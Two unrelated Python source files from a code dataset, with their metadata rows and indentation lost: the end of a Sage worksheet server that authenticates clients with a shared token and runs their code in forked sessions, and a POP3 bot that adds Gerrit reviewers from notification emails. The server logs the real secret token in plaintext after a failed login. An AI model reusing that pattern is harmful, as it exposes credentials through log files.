def __getitem__(self, i):
return self.queue[i]
def __delitem__(self, i):
del self.queue[i]
def next_mesg(self):
"""
Remove oldest message from the queue and return it.
If the queue is empty, wait for a message to arrive
and return it (does not place it in the queue).
"""
if self.queue:
return self.queue.pop()
else:
return self.conn.recv()
def recv(self):
"""
Wait until one message is received and enqueue it.
Also returns the mesg.
"""
mesg = self.conn.recv()
self.queue.insert(0,mesg)
return mesg
def session(conn):
"""
This is run by the child process that is forked off on each new
connection. It drops privileges, then handles the complete
compute session.
INPUT:
- ``conn`` -- the TCP connection
"""
mq = MessageQueue(conn)
pid = os.getpid()
# seed the random number generator(s)
import sage.all; sage.all.set_random_seed()
import random; random.seed(sage.all.initial_seed())
# get_memory_usage is not aware of being forked...
import sage.misc.getusage
sage.misc.getusage._proc_status = "/proc/%s/status"%os.getpid()
cnt = 0
while True:
try:
typ, mesg = mq.next_mesg()
#print('INFO:child%s: received message "%s"'%(pid, mesg))
log("handling message ", truncate_text(unicode8(mesg), 400))
event = mesg['event']
if event == 'terminate_session':
return
elif event == 'execute_code':
try:
execute(conn = conn,
id = mesg['id'],
code = mesg['code'],
data = mesg.get('data',None),
cell_id = mesg.get('cell_id',None),
preparse = mesg.get('preparse',True),
message_queue = mq)
except Exception as err:
log("ERROR -- exception raised '%s' when executing '%s'"%(err, mesg['code']))
elif event == 'introspect':
import sys
try:
# check for introspect from jupyter cell
prefix = Salvus._default_mode
if 'top' in mesg:
top = mesg['top']
log('introspect cell top line %s'%top)
if top.startswith("%"):
prefix = top[1:]
try:
# see if prefix is the name of a jupyter kernel function
# to qualify, prefix should be the name of a function
# and that function has free variables "i_am_a_jupyter_client" and "kn"
jkfn = namespace[prefix]
jupyter_client_index = jkfn.func_code.co_freevars.index("i_am_a_jupyter_client")
jkix = jkfn.func_code.co_freevars.index("kn") # e.g. 3
jkname = jkfn.func_closure[jkix].cell_contents # e.g. "python2"
# consider also checking for jkname in list of jupyter kernels
log("jupyter introspect %s: %s"%(prefix, jkname)) # e.g. "p2", "python2"
jupyter_introspect(conn=conn,
id=mesg['id'],
line=mesg['line'],
preparse=mesg.get('preparse', True),
jkfn=jkfn)
except:
# non-jupyter introspection
introspect(conn=conn, id=mesg['id'], line=mesg['line'], preparse=mesg.get('preparse', True))
except:
pass
else:
raise RuntimeError("invalid message '%s'"%mesg)
except:
# When hub connection dies, loop goes crazy.
# Unfortunately, just catching SIGINT doesn't seem to
# work, and leads to random exits during a
# session. Howeer, when connection dies, 10000 iterations
# happen almost instantly. Ugly, but it works.
cnt += 1
if cnt > 10000:
sys.exit(0)
else:
pass
def jupyter_introspect(conn, id, line, preparse, jkfn):
import jupyter_client
from Queue import Empty
try:
salvus = Salvus(conn=conn, id=id)
kcix = jkfn.func_code.co_freevars.index("kc")
kc = jkfn.func_closure[kcix].cell_contents
msg_id = kc.complete(line)
shell = kc.shell_channel
iopub = kc.iopub_channel
# handle iopub responses
while True:
try:
msg = iopub.get_msg(timeout = 1)
msg_type = msg['msg_type']
content = msg['content']
except Empty:
# shouldn't happen
log("jupyter iopub channel empty")
break
if msg['parent_header'].get('msg_id') != msg_id:
continue
log("jupyter iopub recv %s %s"%(msg_type, str(content)))
if msg_type == 'status' and content['execution_state'] == 'idle':
break
# handle shell responses
while True:
try:
msg = shell.get_msg(timeout = 10)
msg_type = msg['msg_type']
content = msg['content']
except:
# shouldn't happen
log("jupyter shell channel empty")
break
if msg['parent_header'].get('msg_id') != msg_id:
continue
log("jupyter shell recv %s %s"%(msg_type, str(content)))
if msg_type == 'complete_reply' and content['status'] == 'ok':
# jupyter kernel returns matches like "xyz.append" and smc wants just "append"
matches = content['matches']
offset = content['cursor_end'] - content['cursor_start']
completions = [s[offset:] for s in matches]
mesg = message.introspect_completions(id=id, completions=completions, target=line[-offset:])
conn.send_json(mesg)
break
except:
log("jupyter completion exception: %s"%sys.exc_info()[0])
def introspect(conn, id, line, preparse):
salvus = Salvus(conn=conn, id=id) # so salvus.[tab] works -- note that Salvus(...) modifies namespace.
z = sage_parsing.introspect(line, namespace=namespace, preparse=preparse)
if z['get_completions']:
mesg = message.introspect_completions(id=id, completions=z['result'], target=z['target'])
elif z['get_help']:
mesg = message.introspect_docstring(id=id, docstring=z['result'], target=z['expr'])
elif z['get_source']:
mesg = message.introspect_source_code(id=id, source_code=z['result'], target=z['expr'])
conn.send_json(mesg)
def handle_session_term(signum, frame):
while True:
try:
pid, exit_status = os.waitpid(-1, os.WNOHANG)
except:
return
if not pid: return
secret_token = None
secret_token_path = os.path.join(os.environ['SMC'], 'secret_token')
def unlock_conn(conn):
global secret_token
if secret_token is None:
try:
secret_token = open(secret_token_path).read().strip()
except:
conn.send('n')
conn.send("Unable to accept connection, since Sage server doesn't yet know the secret token; unable to read from '%s'"%secret_token_path)
conn.close()
n = len(secret_token)
token = ''
while len(token) < n:
token += conn.recv(n)
if token != secret_token[:len(token)]:
break # definitely not right -- don't try anymore
if token != secret_token:
log("token='%s'; secret_token='%s'"%(token, secret_token))
conn.send('n') # no -- invalid login
conn.send("Invalid secret token.")
conn.close()
return False
else:
conn.send('y') # yes -- valid login
return True
def serve_connection(conn):
global PID
PID = os.getpid()
# First the client *must* send the secret shared token. If they
# don't, we return (and the connection will have been destroyed by
# unlock_conn).
log("Serving a connection")
log("Waiting for client to unlock the connection...")
# TODO -- put in a timeout (?)
if not unlock_conn(conn):
log("Client failed to unlock connection. Dumping them.")
return
log("Connection unlocked.")
try:
conn = ConnectionJSON(conn)
typ, mesg = conn.recv()
log("Received message %s"%mesg)
except Exception as err:
log("Error receiving message: %s (connection terminated)"%str(err))
raise
if mesg['event'] == 'send_signal':
if mesg['pid'] == 0:
log("invalid signal mesg (pid=0)")
else:
log("Sending a signal")
os.kill(mesg['pid'], mesg['signal'])
return
if mesg['event'] != 'start_session':
log("Received an unknown message event = %s; terminating session."%mesg['event'])
return
log("Starting a session")
desc = message.session_description(os.getpid())
log("child sending session description back: %s"%desc)
conn.send_json(desc)
session(conn=conn)
def serve(port, host, extra_imports=False):
#log.info('opening connection on port %s', port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# check for children that have finished every few seconds, so
# we don't end up with zombies.
s.settimeout(5)
s.bind((host, port))
log('Sage server %s:%s'%(host, port))
# Enabling the following signal completely breaks subprocess pexpect in many cases, which is
# obviously totally unacceptable.
#signal.signal(signal.SIGCHLD, handle_session_term)
def init_library():
tm = time.time()
log("pre-importing the sage library...")
# FOR testing purposes.
##log("fake 40 second pause to slow things down for testing....")
##time.sleep(40)
##log("done with pause")
# Monkey patching interact using the new and improved Salvus
# implementation of interact.
import sagenb.notebook.interact
sagenb.notebook.interact.interact = sage_salvus.interact
# Actually import sage now. This must happen after the interact
# import because of library interacts.
log("import sage...")
import sage.all
log("imported sage.")
# Monkey patch the html command.
import sage.interacts.library
sage.all.html = sage.misc.html.html = sage.interacts.library.html = sage_salvus.html
# Set a useful figsize default; the matplotlib one is not notebook friendly.
import sage.plot.graphics
sage.plot.graphics.Graphics.SHOW_OPTIONS['figsize']=[8,4]
# Monkey patch latex.eval, so that %latex works in worksheets
sage.misc.latex.latex.eval = sage_salvus.latex0
# Plot, integrate, etc., -- so startup time of worksheets is minimal.
cmds = ['from sage.all import *',
'from sage.calculus.predefined import x',
'import pylab']
if extra_imports:
cmds.extend(['import scipy',
'import sympy',
"plot(sin).save('%s/a.png'%os.environ['SMC'], figsize=2)",
'integrate(sin(x**2),x)'])
tm0 = time.time()
for cmd in cmds:
log(cmd)
exec cmd in namespace
global pylab
pylab = namespace['pylab'] # used for clearing
log('imported sage library and other components in %s seconds'%(time.time() - tm))
for k,v in sage_salvus.interact_functions.iteritems():
namespace[k] = sagenb.notebook.interact.__dict__[k] = v
namespace['_salvus_parsing'] = sage_parsing
for name in ['coffeescript', 'javascript', 'time', 'timeit', 'capture', 'cython',
'script', 'python', 'python3', 'perl', 'ruby', 'sh', 'prun', 'show', 'auto',
'hide', 'hideall', 'cell', 'fork', 'exercise', 'dynamic', 'var','jupyter',
'reset', 'restore', 'md', 'load', 'attach', 'runfile', 'typeset_mode', 'default_mode',
'sage_chat', 'fortran', 'magics', 'go', 'julia', 'pandoc', 'wiki', 'plot3d_using_matplotlib',
'mediawiki', 'help', 'raw_input', 'clear', 'delete_last_output', 'sage_eval']:
namespace[name] = getattr(sage_salvus, name)
namespace['sage_server'] = sys.modules[__name__] # http://stackoverflow.com/questions/1676835/python-how-do-i-get-a-reference-to-a-module-inside-the-module-itself
# alias pretty_print_default to typeset_mode, since sagenb has/uses that.
namespace['pretty_print_default'] = namespace['typeset_mode']
# and monkey patch it
sage.misc.latex.pretty_print_default = namespace['pretty_print_default']
sage_salvus.default_namespace = dict(namespace)
log("setup namespace with extra functions")
# Sage's pretty_print and view are both ancient and a mess
sage.all.pretty_print = sage.misc.latex.pretty_print = namespace['pretty_print'] = namespace['view'] = namespace['show']
# this way client code can tell it is running as a Sage Worksheet.
namespace['__SAGEWS__'] = True
log("Initialize sage library.")
init_library()
t = time.time()
s.listen(128)
i = 0
children = {}
log("Starting server listening for connections")
try:
while True:
i += 1
#print i, time.time()-t, 'cps: ', int(i/(time.time()-t))
# do not use log.info(...) in the server loop; threads = race conditions that hang server every so often!!
try:
if children:
for pid in children.keys():
if os.waitpid(pid, os.WNOHANG) != (0,0):
log("subprocess %s terminated, closing connection"%pid)
conn.close()
del children[pid]
try:
conn, addr = s.accept()
log("Accepted a connection from", addr)
except:
# this will happen periodically since we did s.settimeout above, so
# that we wait for children above periodically.
continue
except socket.error, msg:
continue
child_pid = os.fork()
if child_pid: # parent
log("forked off child with pid %s to handle this connection"%child_pid)
children[child_pid] = conn
else:
# child
global PID
PID = os.getpid()
log("child process, will now serve this new connection")
serve_connection(conn)
# end while
except Exception as err:
log("Error taking connection: ", err)
traceback.print_exc(file=sys.stdout)
#log.error("error: %s %s", type(err), str(err))
finally:
log("closing socket")
#s.shutdown(0)
s.close()
def run_server(port, host, pidfile, logfile=None):
global LOGFILE
if logfile:
LOGFILE = logfile
if pidfile:
open(pidfile,'w').write(str(os.getpid()))
log("run_server: port=%s, host=%s, pidfile='%s', logfile='%s'"%(port, host, pidfile, LOGFILE))
try:
serve(port, host)
finally:
if pidfile:
os.unlink(pidfile)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Run Sage server")
parser.add_argument("-p", dest="port", type=int, default=0,
help="port to listen on (default: 0); 0 = automatically allocated; saved to $SMC/data/sage_server.port")
parser.add_argument("-l", dest='log_level', type=str, default='INFO',
help="log level (default: INFO) useful options include WARNING and DEBUG")
parser.add_argument("-d", dest="daemon", default=False, action="store_const", const=True,
help="daemon mode (default: False)")
parser.add_argument("--host", dest="host", type=str, default='127.0.0.1',
help="host interface to bind to -- default is 127.0.0.1")
parser.add_argument("--pidfile", dest="pidfile", type=str, default='',
help="store pid in this file")
parser.add_argument("--logfile", dest="logfile", type=str, default='',
help="store log in this file (default: '' = don't log to a file)")
parser.add_argument("-c", dest="client", default=False, action="store_const", const=True,
help="run in test client mode number 1 (command line)")
parser.add_argument("--hostname", dest="hostname", type=str, default='',
help="hostname to connect to in client mode")
parser.add_argument("--portfile", dest="portfile", type=str, default='',
help="write port to this file")
args = parser.parse_args()
if args.daemon and not args.pidfile:
print("%s: must specify pidfile in daemon mode" % sys.argv[0])
sys.exit(1)
if args.log_level:
pass
#level = getattr(logging, args.log_level.upper())
#log.setLevel(level)
if args.client:
client1(port=args.port if args.port else int(open(args.portfile).read()), hostname=args.hostname)
sys.exit(0)
if not args.port:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind(('',0)) # pick a free port
args.port = s.getsockname()[1]
del s
if args.portfile:
open(args.portfile,'w').write(str(args.port))
pidfile = os.path.abspath(args.pidfile) if args.pidfile else ''
logfile = os.path.abspath(args.logfile) if args.logfile else ''
if logfile:
LOGFILE = logfile
open(LOGFILE, 'w') # for now we clear it on restart...
log("setting logfile to %s"%LOGFILE)
main = lambda: run_server(port=args.port, host=args.host, pidfile=pidfile)
if args.daemon and args.pidfile:
import daemon
daemon.daemonize(args.pidfile)
main()
else:
main()
| gpl-3.0 | -7,304,380,971,359,334,000 | 38.188223 | 247 | 0.563432 | false |
valhallasw/gerrit-reviewer-bot | pop3bot.py | 1 | 4056 | import sys
import poplib
import email.parser
import logging
import traceback
from email.message import Message
from typing import Iterable, Dict, Tuple
import gerrit_rest
from add_reviewer import ReviewerFactory, add_reviewers
logger = logging.getLogger('pop3bot')
def mkmailbox(debug=0):
import config
username = config.username
password = config.password
mailbox = poplib.POP3_SSL('pop.googlemail.com', '995')
mailbox.set_debuglevel(debug)
mailbox.user(username)
mailbox.pass_(password)
return mailbox
def mail_generator(mailbox) -> Iterable[str]:
""" RETRieves the contents of mails, yields those
and DELEtes them before the next mail is RETRieved """
nmails, octets = mailbox.stat()
for i in range(1, nmails + 1):
# use TOP rather than REPR; gmail (sometimes?) interprets REPR'd
# messages as read and does not report them again (sigh)
yield b"\n".join(mailbox.top(i, 1000)[1])
mailbox.dele(i)
def message_generator(emails: Iterable[bytes]) -> Iterable[Tuple[Message, str]]:
p = email.parser.BytesParser()
for mail in emails:
mail = p.parsebytes(mail)
# if mail is multipart-mime (probably not from gerrit)
# mail.get_payload() is a list rather than a string
# and mail.get_payload(decode=True) returns None
m = mail
while isinstance(m.get_payload(), list):
m = m.get_payload()[0]
yield mail, m.get_payload(decode=True).decode('utf-8', 'replace')
def gerritmail_generator(generator: Iterable[Tuple[Message, str]]) -> Iterable[Dict[str, str]]:
for message, contents in generator:
mi = dict(list(message.items()))
subject = mi.get('Subject', 'Unknown')
sender = mi.get('From', 'Unknown')
gerrit_data = {}
for (header, value) in message.items():
if header.startswith("X-Gerrit"):
gerrit_data[header] = value
for line in contents.split("\n"):
if line.startswith("Gerrit-") and ": " in line:
k, v = line.split(": ", 1)
gerrit_data[k] = v
print(subject, sender, gerrit_data.get('X-Gerrit-Change-Id'))
if gerrit_data:
yield gerrit_data
else:
print("Skipping; Contents: ")
print(contents)
def new_changeset_generator(g: gerrit_rest.GerritREST, mail_generator: Iterable[Dict[str, str]]) -> Iterable[Dict]:
for mail in mail_generator:
mt = mail.get('X-Gerrit-MessageType', '')
ps = mail.get('Gerrit-PatchSet', '')
commit = mail['X-Gerrit-Commit']
if mt != 'newchange':
print("skipping message (%s)" % mt)
continue
if ps != '1':
print("skipping PS%s" % ps)
continue
print("(getting ", commit, ")")
matchingchange = g.get_changeset(commit)
if matchingchange:
yield matchingchange
else:
print("Could not find matching change for %s" % commit)
def main():
g = gerrit_rest.GerritREST('https://gerrit.wikimedia.org/r')
RF = ReviewerFactory()
mailbox = mkmailbox(0)
nmails, octets = mailbox.stat()
print("%i e-mails to process (%i kB)" % (nmails, octets / 1024))
try:
emails = mail_generator(mailbox)
messages = message_generator(emails)
gerritmails = gerritmail_generator(messages)
changesets = new_changeset_generator(g, gerritmails)
for j, changeset in enumerate(changesets):
try:
reviewers = RF.get_reviewers_for_changeset(changeset)
add_reviewers(changeset['id'], reviewers)
except Exception:
sys.stdout.write(repr(changeset) + "\n caused exception:")
traceback.print_exc()
sys.stderr.write(repr(changeset) + "\n caused exception:")
raise
finally:
# flush succesfully processed emails
mailbox.quit()
if __name__ == "__main__":
main()
| mit | 453,748,591,061,692,100 | 30.2 | 115 | 0.603797 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.